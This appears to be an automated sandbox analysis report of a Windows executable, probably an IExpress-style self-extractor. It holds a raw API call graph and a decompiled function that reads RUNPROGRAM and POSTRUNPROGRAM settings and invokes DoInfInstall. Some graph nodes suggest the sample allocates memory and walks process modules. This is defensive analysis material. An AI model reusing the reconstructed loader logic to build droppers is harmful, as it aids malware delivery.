20 API calls 3057->3059 3058 403e1f GetProcAddress 3060 403f64 3058->3060 3058->3067 3061 403fa9 3059->3061 3062 4044b9 20 API calls 3060->3062 3063 403f7c LocalFree 3061->3063 3064 403f75 FreeLibrary 3062->3064 3065 406285 GetLastError 3063->3065 3064->3063 3066 403f8b 3065->3066 3066->3045 3067->3057 3067->3058 3068 403f40 FreeLibrary 3067->3068 3069 403eff FreeLibrary 3067->3069 3356 406495 3067->3356 3068->3051 3069->3052 3071 40468f 7 API calls 3070->3071 3072 403a55 LocalAlloc 3071->3072 3073 403a6c 3072->3073 3074 403a8e 3072->3074 3076 4044b9 20 API calls 3073->3076 3075 40468f 7 API calls 3074->3075 3077 403a98 3075->3077 3078 403a7d 3076->3078 3080 403ac5 lstrcmpA 3077->3080 3081 403a9c 3077->3081 3079 406285 GetLastError 3078->3079 3087 402f64 3079->3087 3083 403ada 3080->3083 3084 403b0d LocalFree 3080->3084 3082 4044b9 20 API calls 3081->3082 3085 403aad LocalFree 3082->3085 3086 406517 24 API calls 3083->3086 3084->3087 3085->3087 3088 403aec LocalFree 3086->3088 3087->2649 3087->2657 3088->3087 3090 40628f 3089->3090 3090->2657 3092 40468f 7 API calls 3091->3092 3093 40417d LocalAlloc 3092->3093 3094 404195 3093->3094 3095 4041a8 3093->3095 3096 4044b9 20 API calls 3094->3096 3097 40468f 7 API calls 3095->3097 3099 4041a6 3096->3099 3098 4041b5 3097->3098 3100 4041c5 lstrcmpA 3098->3100 3101 4041b9 3098->3101 3099->2657 3100->3101 3102 4041e6 LocalFree 3100->3102 3103 4044b9 20 API calls 3101->3103 3102->3099 3103->3102 3105 40171e _vsnprintf 3104->3105 3115 4062c9 FindResourceA 3105->3115 3107 406353 3109 406ce0 4 API calls 3107->3109 3108 4062cb LoadResource LockResource 3108->3107 3111 4062e0 3108->3111 3110 4051ca 3109->3110 3110->2953 3110->2954 3112 406355 FreeResource 3111->3112 3113 40631b FreeResource 3111->3113 3112->3107 3114 40171e _vsnprintf 3113->3114 3114->3115 3115->3107 3115->3108 3117 40548a 3116->3117 3118 40551a 3116->3118 3176 4053a1 3117->3176 3187 4058c8 3118->3187 3120 405495 3126 4054c2 GetSystemInfo 3120->3126 3127 40550c 3120->3127 3131 405581 3120->3131 3123 406ce0 4 API calls 3128 40559a 3123->3128 3124 40553b CreateDirectoryA 3129 405577 3124->3129 3130 405547 3124->3130 3125 40554d 3125->3131 3132 40597d 34 API calls 3125->3132 3138 4054da 3126->3138 3133 40658a CharPrevA 3127->3133 3128->2991 3140 402630 GetWindowsDirectoryA 3128->3140 3134 406285 GetLastError 3129->3134 3130->3125 3131->3123 3135 40555c 3132->3135 3133->3118 3136 40557c 3134->3136 3135->3131 3139 405568 RemoveDirectoryA 3135->3139 3136->3131 3137 40658a CharPrevA 3137->3127 3138->3127 3138->3137 3139->3131 3141 40265e 3140->3141 3142 40266f 3140->3142 3143 4044b9 20 API calls 3141->3143 3144 406ce0 4 API calls 3142->3144 3143->3142 3145 402687 3144->3145 3145->2977 3145->2993 3147 4069a1 3146->3147 3148 40696e GetDiskFreeSpaceA 3146->3148 3147->3001 3148->3147 3149 406989 MulDiv 3148->3149 3149->3147 3151 4059bb 3150->3151 3152 4059dd GetDiskFreeSpaceA 3150->3152 3153 4044b9 20 API calls 3151->3153 3154 405ba1 memset 3152->3154 3155 405a21 MulDiv 3152->3155 3156 4059cc 3153->3156 3157 406285 GetLastError 3154->3157 3155->3154 3158 405a50 GetVolumeInformationA 3155->3158 3159 406285 GetLastError 3156->3159 3160 405bbc GetLastError FormatMessageA 3157->3160 3161 405ab5 SetCurrentDirectoryA 3158->3161 3162 405a6e memset 3158->3162 3163 4059d1 3159->3163 3164 405be3 3160->3164 3166 405acc 3161->3166 3165 406285 GetLastError 3162->3165 3170 406ce0 4 API calls 3163->3170 3167 4044b9 20 API calls 3164->3167 3168 405a89 GetLastError FormatMessageA 3165->3168 3172 405b0a 3166->3172 3174 405b20 3166->3174 3169 405bf5 SetCurrentDirectoryA 3167->3169 3168->3164 3169->3163 3171 405c11 3170->3171 3171->2977 3173 4044b9 20 API calls 3172->3173 3173->3163 3174->3163 3199 40268b 3174->3199 3180 4053bf 3176->3180 3177 40171e _vsnprintf 3177->3180 3178 40658a CharPrevA 3179 4053fa RemoveDirectoryA GetFileAttributesA 3178->3179 3179->3180 3181 40544f CreateDirectoryA 3179->3181 3180->3177 3180->3178 3182 405415 GetTempFileNameA 3180->3182 3181->3182 3183 40543a 3181->3183 3182->3183 3184 405429 DeleteFileA CreateDirectoryA 3182->3184 3185 406ce0 4 API calls 3183->3185 3184->3183 3186 405449 3185->3186 3186->3120 3188 4058d8 3187->3188 3188->3188 3189 4058df LocalAlloc 3188->3189 3190 4058f3 3189->3190 3191 405919 3189->3191 3192 4044b9 20 API calls 3190->3192 3194 40658a CharPrevA 3191->3194 3193 405906 3192->3193 3195 406285 GetLastError 3193->3195 3196 405534 3193->3196 3197 405931 CreateFileA LocalFree 3194->3197 3195->3196 3196->3124 3196->3125 3197->3193 3198 40595b CloseHandle GetFileAttributesA 3197->3198 3198->3193 3200 4026e5 3199->3200 3201 4026b9 3199->3201 3202 4026ea 3200->3202 3203 40271f 3200->3203 3204 40171e _vsnprintf 3201->3204 3205 40171e _vsnprintf 3202->3205 3208 40171e _vsnprintf 3203->3208 3214 4026e3 3203->3214 3206 4026cc 3204->3206 3207 4026fd 3205->3207 3210 4044b9 20 API calls 3206->3210 3211 4044b9 20 API calls 3207->3211 3212 402735 3208->3212 3209 406ce0 4 API calls 3213 40276d 3209->3213 3210->3214 3211->3214 3215 4044b9 20 API calls 3212->3215 3213->3163 3214->3209 3215->3214 3217 40468f 7 API calls 3216->3217 3218 404ff5 FindResourceA LoadResource LockResource 3217->3218 3219 405020 3218->3219 3232 40515f 3218->3232 3220 405057 3219->3220 3221 405029 GetDlgItem ShowWindow GetDlgItem ShowWindow 3219->3221 3235 404efd 3220->3235 3221->3220 3224 405060 3226 4044b9 20 API calls 3224->3226 3225 40507c 3227 4044b9 20 API calls 3225->3227 3230 405075 3225->3230 3226->3230 3227->3230 3228 405110 FreeResource 3229 40511d 3228->3229 3231 40513a 3229->3231 3233 4044b9 20 API calls 3229->3233 3230->3228 3230->3229 3231->3232 3234 40514c SendMessageA 3231->3234 3232->3019 3233->3231 3234->3232 3236 404f4a 3235->3236 3242 404fa1 3236->3242 3243 404980 3236->3243 3238 406ce0 4 API calls 3239 404fc6 3238->3239 3239->3224 3239->3225 3242->3238 3244 404990 3243->3244 3245 4049c2 lstrcmpA 3244->3245 3246 4049a5 3244->3246 3248 4049ba 3245->3248 3249 404a0e 3245->3249 3247 4044b9 20 API calls 3246->3247 3247->3248 3248->3242 3251 404b60 3248->3251 3249->3248 3254 40487a 3249->3254 3252 404b92 FindCloseChangeNotification 3251->3252 3253 404b76 3251->3253 3252->3253 3253->3242 3255 4048a2 CreateFileA 3254->3255 3257 404908 3255->3257 3258 4048e9 3255->3258 3257->3248 3258->3257 3259 4048ee 3258->3259 3262 40490c 3259->3262 3263 4048f5 CreateFileA 3262->3263 3265 404917 3262->3265 3263->3257 3264 404962 CharNextA 3264->3265 3265->3263 3265->3264 3266 404953 CreateDirectoryA 3265->3266 3266->3264 3268 402510 3267->3268 3269 40255b 3267->3269 3270 40658a CharPrevA 3268->3270 3271 406ce0 4 API calls 3269->3271 3272 402522 WritePrivateProfileStringA _lopen 3270->3272 3273 402569 3271->3273 3272->3269 3274 402548 _llseek _lclose 3272->3274 3273->3029 3274->3269 3276 401b25 3275->3276 3380 401a84 3276->3380 3278 401b57 3279 40658a CharPrevA 3278->3279 3281 401b8c 3278->3281 3279->3281 3280 4066c8 2 API calls 3282 401bd1 3280->3282 3281->3280 3283 401d73 3282->3283 3284 401bd9 CompareStringA 3282->3284 3286 4066c8 2 API calls 3283->3286 3284->3283 3285 401bf7 GetFileAttributesA 3284->3285 3287 401d53 3285->3287 3288 401c0d 3285->3288 3289 401d7d 3286->3289 3290 401d64 3287->3290 3288->3287 3295 401a84 2 API calls 3288->3295 3291 401d81 CompareStringA 3289->3291 3292 401df8 LocalAlloc 3289->3292 3293 4044b9 20 API calls 3290->3293 3291->3292 3300 401d9b 3291->3300 3292->3290 3294 401e0b GetFileAttributesA 3292->3294 3296 401d6c 3293->3296 3297 401e1d 3294->3297 3314 401e45 3294->3314 3298 401c31 3295->3298 3302 406ce0 4 API calls 3296->3302 3297->3314 3299 401c50 LocalAlloc 3298->3299 3303 401a84 2 API calls 3298->3303 3299->3290 3301 401c67 GetPrivateProfileIntA GetPrivateProfileStringA 3299->3301 3300->3300 3304 401dbe LocalAlloc 3300->3304 3309 401cf8 3301->3309 3313 401cc2 3301->3313 3307 401ea1 3302->3307 3303->3299 3304->3290 3308 401de1 3304->3308 3307->3049 3312 40171e _vsnprintf 3308->3312 3310 401d23 3309->3310 3311 401d09 GetShortPathNameA 3309->3311 3315 40171e _vsnprintf 3310->3315 3311->3310 3312->3313 3313->3296 3386 402aac 3314->3386 3315->3313 3317 402256 3316->3317 3318 40209a 3316->3318 3319 406ce0 4 API calls 3317->3319 3321 40171e _vsnprintf 3318->3321 3323 4020dc 3318->3323 3320 402263 3319->3320 3320->3049 3322 4020af RegQueryValueExA 3321->3322 3322->3318 3322->3323 3324 4020e4 RegCloseKey 3323->3324 3325 4020fb GetSystemDirectoryA 3323->3325 3324->3317 3326 40658a CharPrevA 3325->3326 3327 40211b LoadLibraryA 3326->3327 3328 402179 GetModuleFileNameA 3327->3328 3329 40212e GetProcAddress FreeLibrary 3327->3329 3330 4021de RegCloseKey 3328->3330 3334 402177 3328->3334 3329->3328 3331 40214e GetSystemDirectoryA 3329->3331 3330->3317 3332 402165 3331->3332 3331->3334 3333 40658a CharPrevA 3332->3333 3333->3334 3334->3334 3335 4021b7 LocalAlloc 3334->3335 3336 4021ec 3335->3336 3337 4021cd 3335->3337 3339 40171e _vsnprintf 3336->3339 3338 4044b9 20 API calls 3337->3338 3338->3330 3340 402218 RegSetValueExA RegCloseKey LocalFree 3339->3340 3340->3317 3343 404016 CreateProcessA 3342->3343 3354 404106 3342->3354 3344 404041 WaitForSingleObject GetExitCodeProcess 3343->3344 3345 4040c4 3343->3345 3350 404070 3344->3350 3347 406285 GetLastError 3345->3347 3346 406ce0 4 API calls 3348 404117 3346->3348 3349 4040c9 GetLastError FormatMessageA 3347->3349 3348->3049 3352 4044b9 20 API calls 3349->3352 3413 40411b 3350->3413 3352->3354 3353 404096 CloseHandle CloseHandle 3353->3354 3355 4040ba 3353->3355 3354->3346 3355->3354 3357 4064c2 3356->3357 3358 40658a CharPrevA 3357->3358 3359 4064d8 GetFileAttributesA 3358->3359 3360 406501 LoadLibraryA 3359->3360 3361 4064ea 3359->3361 3362 406508 3360->3362 3361->3360 3363 4064ee LoadLibraryExA 3361->3363 3364 406ce0 4 API calls 3362->3364 3363->3362 3365 406513 3364->3365 3365->3067 3367 402289 RegOpenKeyExA 3366->3367 3369 402381 3366->3369 3367->3369 3370 4022b1 RegQueryValueExA 3367->3370 3368 406ce0 4 API calls 3371 40238c 3368->3371 3369->3368 3372 402374 RegCloseKey 3370->3372 3373 4022e6 memset GetSystemDirectoryA 3370->3373 3371->3045 3372->3369 3374 402321 3373->3374 3375 40230f 3373->3375 3377 40171e _vsnprintf 3374->3377 3376 40658a CharPrevA 3375->3376 3376->3374 3378 40233f RegSetValueExA 3377->3378 3378->3372 3381 401a9a 3380->3381 3383 401aba 3381->3383 3385 401aaf 3381->3385 3399 40667f 3381->3399 3383->3278 3384 40667f 2 API calls 3384->3385 3385->3383 3385->3384 3387 402ad4 GetModuleFileNameA 3386->3387 3388 402be6 3386->3388 3398 402b02 3387->3398 3389 406ce0 4 API calls 3388->3389 3391 402bf5 3389->3391 3390 402af1 IsDBCSLeadByte 3390->3398 3391->3296 3392 402b11 CharNextA CharUpperA 3395 402b8d CharUpperA 3392->3395 3392->3398 3393 402bca CharNextA 3394 402bd3 CharNextA 3393->3394 3394->3398 3395->3398 3397 402b43 CharPrevA 3397->3398 3398->3388 3398->3390 3398->3392 3398->3393 3398->3394 3398->3397 3404 4065e8 3398->3404 3402 406689 3399->3402 3400 406648 IsDBCSLeadByte 3400->3402 3401 4066a5 3401->3381 3402->3400 3402->3401 3403 406697 CharNextA 3402->3403 3403->3402 3405 4065f4 3404->3405 3405->3405 3406 4065fb CharPrevA 3405->3406 3407 406611 CharPrevA 3406->3407 3408 40660b 3407->3408 3409 40661e 3407->3409 3408->3407 3408->3409 3410 40663d 3409->3410 3411 406634 CharNextA 3409->3411 3412 406627 CharPrevA 3409->3412 3410->3398 3411->3410 3412->3410 3412->3411 3414 404132 3413->3414 3416 40412a 3413->3416 3417 401ea7 3414->3417 3416->3353 3418 401ed3 3417->3418 3419 401eba 3417->3419 3418->3416 3420 40256d 15 API calls 3419->3420 3420->3418 3422 401ff0 RegOpenKeyExA 3421->3422 3423 402026 3421->3423 3422->3423 3424 40200f RegDeleteValueA RegCloseKey 3422->3424 3423->2691 3424->3423 3489 404ca0 GlobalAlloc 3597 406a20 __getmainargs 3616 4019e0 3617 401a03 3616->3617 3618 401a24 GetDesktopWindow 3616->3618 3620 401a16 EndDialog 3617->3620 3621 401a20 3617->3621 3619 4043d0 11 API calls 3618->3619 3622 401a33 LoadStringA SetDlgItemTextA MessageBeep 3619->3622 3620->3621 3623 406ce0 4 API calls 3621->3623 3622->3621 3624 401a7e 3623->3624 3625 406bef _XcptFilter 3525 407270 _except_handler4_common 3626 4034f0 3627 403504 3626->3627 3647 4035b8 3626->3647 3628 40351b 3627->3628 3629 4035be GetDesktopWindow 3627->3629 3627->3647 3632 40354f 3628->3632 3633 40351f 3628->3633 3631 4043d0 11 API calls 3629->3631 3630 403526 3635 4035d6 3631->3635 3632->3630 3637 403559 ResetEvent 3632->3637 3633->3630 3636 40352d TerminateThread EndDialog 3633->3636 3634 403671 EndDialog 3634->3630 3638 4035e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3635->3638 3639 40361d SetWindowTextA CreateThread 3635->3639 3636->3630 3640 4044b9 20 API calls 3637->3640 3638->3639 3639->3630 3641 403646 3639->3641 3642 403581 3640->3642 3643 4044b9 20 API calls 3641->3643 3644 40359b SetEvent 3642->3644 3646 40358a SetEvent 3642->3646 3643->3647 3645 403680 4 API calls 3644->3645 3645->3647 3646->3630 3647->3630 3647->3634 3648 406ef0 3649 406f2d 3648->3649 3651 406f02 3648->3651 3650 406f27 ?terminate@ 3650->3649 3651->3649 3651->3650 3652 4069b0 3653 4069b5 3652->3653 3661 406fbe GetModuleHandleW 3653->3661 3655 4069c1 __set_app_type __p__fmode __p__commode 3656 4069f9 3655->3656 3657 406a02 __setusermatherr 3656->3657 3658 406a0e 3656->3658 3657->3658 3663 4071ef _controlfp 3658->3663 3660 406a13 3662 406fcf 3661->3662 3662->3655 3663->3660 3490 6902026 3491 6902035 3490->3491 3494 69027c6 3491->3494 3495 69027e1 3494->3495 3496 69027ea CreateToolhelp32Snapshot 3495->3496 3497 6902806 Module32First 3495->3497 3496->3495 3496->3497 3498 6902815 3497->3498 3500 690203e 3497->3500 3501 6902485 3498->3501 3502 69024b0 3501->3502 3503 69024c1 VirtualAlloc 3502->3503 3504 69024f9 3502->3504 3503->3504 3504->3504

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00403BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 36 403ba2-403bd9 37 403bdb-403bee call 40468f 36->37 38 403bfd-403bff 36->38 44 403d13-403d30 call 4044b9 37->44 45 403bf4-403bf7 37->45 40 403c03-403c28 memset 38->40 42 403d35-403d48 call 401781 40->42 43 403c2e-403c40 call 40468f 40->43 49 403d4d-403d52 42->49 43->44 54 403c46-403c49 43->54 55 403f4d 44->55 45->38 45->44 52 403d54-403d6c call 40468f 49->52 53 403d9e-403db6 call 401ae8 49->53 52->44 66 403d6e-403d75 52->66 53->55 64 403dbc-403dc2 53->64 54->44 57 403c4f-403c56 54->57 59 403f4f-403f63 call 406ce0 55->59 61 403c60-403c65 57->61 62 403c58-403c5e 57->62 68 403c75-403c7c 61->68 69 403c67-403c6d 61->69 67 403c6e-403c73 62->67 70 403dc4-403dce 64->70 71 403de6-403de8 64->71 75 403fda-403fe1 66->75 76 403d7b-403d98 CompareStringA 66->76 72 403c87-403c89 67->72 68->72 73 403c7e-403c82 68->73 69->67 70->71 77 403dd0-403dd7 70->77 79 403f0b-403f15 call 403fef 71->79 80 403dee-403df5 71->80 72->49 78 403c8f-403c98 72->78 73->72 81 403fe3 call 402267 75->81 82 403fe8-403fea 75->82 76->53 76->75 77->71 84 403dd9-403ddb 77->84 85 403cf1-403cf3 78->85 86 403c9a-403c9c 78->86 90 403f1a-403f1c 79->90 87 403fab-403fd2 call 4044b9 LocalFree 80->87 88 403dfb-403dfd 80->88 81->82 82->59 84->80 91 403ddd-403de1 call 40202a 84->91 85->53 96 403cf9-403d11 call 40468f 85->96 93 403ca5-403ca7 86->93 94 403c9e-403ca3 86->94 87->55 88->79 95 403e03-403e0a 88->95 98 403f46-403f47 LocalFree 90->98 99 403f1e-403f2d LocalFree 90->99 91->71 93->55 103 403cad 93->103 102 403cb2-403cc5 call 40468f 94->102 95->79 104 403e10-403e19 call 406495 95->104 96->44 96->49 98->55 106 403f33-403f3b 99->106 107 403fd7-403fd9 99->107 102->44 112 403cc7-403ce8 CompareStringA 102->112 103->102 113 403f92-403fa9 call 4044b9 104->113 114 403e1f-403e36 GetProcAddress 104->114 106->40 107->75 112->85 116 403cea-403ced 112->116 125 403f7c-403f90 LocalFree call 406285 113->125 117 403f64-403f76 call 4044b9 FreeLibrary 114->117 118 403e3c-403e80 114->118 116->85 117->125 121 403e82-403e87 118->121 122 403e8b-403e94 118->122 121->122 123 403e96-403e9b 122->123 124 403e9f-403ea2 122->124 123->124 127 403ea4-403ea9 124->127 128 403ead-403eb6 124->128 125->55 127->128 131 403ec1-403ec3 128->131 132 403eb8-403ebd 128->132 133 403ec5-403eca 131->133 134 403ece-403eec 131->134 132->131 133->134 137 403ef5-403efd 134->137 138 403eee-403ef3 134->138 139 403f40 FreeLibrary 137->139 140 403eff-403f09 FreeLibrary 137->140 138->137 139->98 140->99
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00403BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x408004; // 0x8f135e3b
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x409124 =  *0x409124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x408a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x408c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0040468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x409124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00401AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00406CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00403FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x408580;
													if( *0x408580 != 0) {
														E00402267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x408180;
											if( *0x408180 == 0) {
												_t146 = 0x4c7;
												E004044B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x409124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x409a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00406495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E004044B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x409124 = E00406285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E004044B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x408a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x409a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x408a38 & 0x0000ffff;
											_v380 = 0x409154;
											_v376 = _t151;
											_v372 = 0x4091e4;
											_v360 = _t97;
											if( *0x408a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x409a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x408d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x409a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x40a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x409124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x409a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x408a20;
										if( *0x408a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0040202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0040468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x408c42;
									if( *0x408c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x408a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0040468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0040468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00401781( &_v276, 0x104, _t130, 0x408c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0040468F(_t130, 0x409a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                                                    0x00403baa
                                                                                                                                                                                                                                    0x00403bb0
                                                                                                                                                                                                                                    0x00403bb7
                                                                                                                                                                                                                                    0x00403bc0
                                                                                                                                                                                                                                    0x00403bc2
                                                                                                                                                                                                                                    0x00403bc9
                                                                                                                                                                                                                                    0x00403bcb
                                                                                                                                                                                                                                    0x00403bcf
                                                                                                                                                                                                                                    0x00403bd3
                                                                                                                                                                                                                                    0x00403bd9
                                                                                                                                                                                                                                    0x00403bfd
                                                                                                                                                                                                                                    0x00403bfd
                                                                                                                                                                                                                                    0x00403bff
                                                                                                                                                                                                                                    0x00403c03
                                                                                                                                                                                                                                    0x00403c03
                                                                                                                                                                                                                                    0x00403c11
                                                                                                                                                                                                                                    0x00403c16
                                                                                                                                                                                                                                    0x00403c19
                                                                                                                                                                                                                                    0x00403c28
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403c30
                                                                                                                                                                                                                                    0x00403c39
                                                                                                                                                                                                                                    0x00403c40
                                                                                                                                                                                                                                    0x00403d13
                                                                                                                                                                                                                                    0x00403d15
                                                                                                                                                                                                                                    0x00403d21
                                                                                                                                                                                                                                    0x00403d26
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403c4f
                                                                                                                                                                                                                                    0x00403c56
                                                                                                                                                                                                                                    0x00403c60
                                                                                                                                                                                                                                    0x00403c65
                                                                                                                                                                                                                                    0x00403c77
                                                                                                                                                                                                                                    0x00403c78
                                                                                                                                                                                                                                    0x00403c7c
                                                                                                                                                                                                                                    0x00403c7e
                                                                                                                                                                                                                                    0x00403c82
                                                                                                                                                                                                                                    0x00403c82
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403c7c
                                                                                                                                                                                                                                    0x00403c67
                                                                                                                                                                                                                                    0x00403c69
                                                                                                                                                                                                                                    0x00403c6d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403c58
                                                                                                                                                                                                                                    0x00403c58
                                                                                                                                                                                                                                    0x00403c6e
                                                                                                                                                                                                                                    0x00403c6e
                                                                                                                                                                                                                                    0x00403c87
                                                                                                                                                                                                                                    0x00403c89
                                                                                                                                                                                                                                    0x00403d4d
                                                                                                                                                                                                                                    0x00403d4f
                                                                                                                                                                                                                                    0x00403d50
                                                                                                                                                                                                                                    0x00403d52
                                                                                                                                                                                                                                    0x00403d9e
                                                                                                                                                                                                                                    0x00403da8
                                                                                                                                                                                                                                    0x00403daf
                                                                                                                                                                                                                                    0x00403db4
                                                                                                                                                                                                                                    0x00403db6
                                                                                                                                                                                                                                    0x00403f4d
                                                                                                                                                                                                                                    0x00403f4d
                                                                                                                                                                                                                                    0x00403f4f
                                                                                                                                                                                                                                    0x00403f56
                                                                                                                                                                                                                                    0x00403f57
                                                                                                                                                                                                                                    0x00403f58
                                                                                                                                                                                                                                    0x00403f63
                                                                                                                                                                                                                                    0x00403f63
                                                                                                                                                                                                                                    0x00403dbc
                                                                                                                                                                                                                                    0x00403dc0
                                                                                                                                                                                                                                    0x00403dc2
                                                                                                                                                                                                                                    0x00403de6
                                                                                                                                                                                                                                    0x00403de6
